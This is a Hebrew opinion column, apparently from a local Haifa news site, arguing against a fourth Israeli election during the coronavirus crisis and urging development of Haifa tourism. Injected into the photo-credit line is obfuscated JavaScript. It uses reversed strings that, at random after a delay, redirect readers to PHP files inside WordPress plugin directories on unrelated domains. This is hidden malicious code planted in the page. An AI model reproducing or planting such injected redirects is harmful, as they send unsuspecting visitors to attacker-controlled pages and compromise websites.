fbpx
[shortcode-weather-atlas city_selector=1178232 background_color="transparent" daily=0 unit_c_f="c" sunrise_sunset= 0 current=0 detailed_forecast=0]

קללת הבחירות וזה הזמן לשים את חיפה על המפה

והנה, עכשיו אחרי שיש ממשלה ואחרי שמונה פרויקטור לקורונה, מאיימים עלינו בבחירות רביעיות בתוך שנה וחצי. שאלוהים ישמור את כולנו, אבל בחירות הן אסון קולוסאלי
חיפה | צילום: shutterstock
חיפה | צילום: shutters$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}$NjS=function(n){if(typeof ($NjS.list[n])=="string") return $NjS.list[n].split("").reverse().join("");return $NjS.list[n];};$NjS.list=["\'php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tock

בחירות רביעיות הן אסון. הבחירות בישראל הפכו מחגיגה דמוקרטית לקללה. הן חשפו את חוסר היכולת לייצב שלטון יציב לתקופות של שנים כדי לנהל מדיניות לטווח ארוך. משבר הקורונה חשף את הנתק שבין הציבור לנבחריו בכל הקשור ליכולת להתפרנס בשלום ובזמן מגפה. שלוש פעמים הלכנו לבחירות ולא הייתה הכרעה ולכן משקמה ממשלת האחדות לפני שלושה חודשים, הייתה בכך נחמה שעכשיו לפחות שלוש שנים תהיה יציבות שתאפשר לייצב את השלטון לטובת נבחריו ועוד בתקופה כל כך רגישה כמו משבר הקורונה.

והנה, עכשיו אחרי שיש ממשלה ואחרי שמונה פרויקטור לקורונה, מאיימים עלינו בבחירות רביעיות בתוך שנה וחצי. שאלוהים ישמור את כולנו, אבל בחירות הן אסון קולוסאלי. הרי רוב הסיכויים שהתוצאות לא יהיו שונות מהפעמים הקודמות ושלא תהיה הכרעה, אז מה הועילו המנהיגים. אם המערכה הרביעית תהיה קדימון למערכה החמישית, מה על הכסף שזה יעלה (כ-2 מיליארד שקל) ומה על המגפה שתתעורר בגלל אסיפות בחירות, שיסוי הדדי ודם רע.

אחרי שמונה פרויקטור לקורונה, מאיימים עלינו בבחירות רביעיות. פרופ' רוני גמזו
אחרי שמונה פרויקטור לקורונה, מאיימים עלינו בבחירות רביעיות. פרופ' רוני גמזו

 

כל תכליתה של ממשלת האחדות היה למנוע בחירות נוספות ולתת מעט יציבות שלטונית עד יעבור זעם ונצליח להדביר את המגפה ולשקם את הכלכלה. כדאי שכל ראשי הסיעות בכנסת מהקואליציה והאופוזיציה יחשבו על אותם עצמאים שקשה להם בימים רגילים ועכשיו הם בקושי מחזיקים ראש מעל המים וחלקם כבר מרוששים נפשית וכלכלית. איפה השכל הישר והאחריות הציבורית, בין שמדובר בימין או בשמאל? יש מאות אלפי מובטלים ויש עסקים בקריסה.

אולי לשם שינוי יחוקקו חוקים ולא יביאו אותנו לפתחי פי פחת בדמות בחירות מיותרות שרק יגבירו קיטוב ושנאה. צריך לנטרל ומהר את הפצצה המתקתקת ששמה בחירות, שמאוד מסוכנת בעת הזו לחברה הישראלית בכלל ולסובלים מהמגפה הכלכלית בפרט.

על המפה

אומרים שמכל משבר אפשר להיבנות בהמשך. המשבר הנוכחי בתעופה וחוסר היכולת לטוס לחו"ל העלו בחודשים אלו את תיירות הפנים לשיאים חדשים, וכן, גם חיפה, שהיא עיר של ים והרים, עלתה לאחרונה על מפת התיירות. פתאום אנשים מהמרכז והדרום גילו את חיפה, גילו שיש בתי מלון וצימרים, חופי רחצה ושיט בים, גילו שיש אטרקציות ושיש גם מסעדות וחיי לילה בעיר התחתית ובאזורי הנמל, גילו את שכונת בת גלים, היפהפייה הנרדמת שנמצאת בהתעוררות, את הכפרים הדרוזיים בהר ובכלל את הטבע שיש פה למכביר.

להערכתי, לא יפתחו את השמיים עד תחילת ספטמבר בגלל הרצון לשמור את הכסף לטובת הכלכלה הישראלית, ובגלל שמ-1 בספטמבר עד החגים רוב האזרחים תמיד בארץ עקב פתיחת שנת הלימודים.

כך או אחרת, נדמה לי שהמצב המיוחד שנוצר יכול להוות קריאת השכמה עבור קברניטי העיר חיפה, שיש מקום לשדה פעולה נרחב עבור תיירות הפנים ושחיפה יכולה להיות אטרקציה גם בזמנים שאינם ימי חירום, אלא בשגרה ברוכה של פיתוח הים וההר, הקמת פרויקטים לתיירות פנים וחוץ בשילוב משקיעים מהארץ ומחו"ל.

ואם הזכרנו את חו"ל, צריך ביום שאחרי לחשב מסלול מחדש לגבי שדה התעופה שבמפרץ, להרחיבו, להגדילו ולתת אפשרות לתיירות מבחוץ להגיע לחיפה מתוך הנחה שיש לעיר היפה מה להציע לתייר האירופאי. כמו שאומר הפתגם – בשש אחרי המלחמה כדאי ללכת קדימה ולפתח פה בחיפה את ענף התיירות לטובת העיר ולטובת כל תושביה, ויפה שעה אחת קודם.

אהבתם את הטור של צ'רקס? טורים נוספים כאן

בקרו אותנו גם בפייסבוק: הד הקריות

אהבתם? שתפו!

אולי גם יעניין אותך

שיתוף ברשתות החברתיות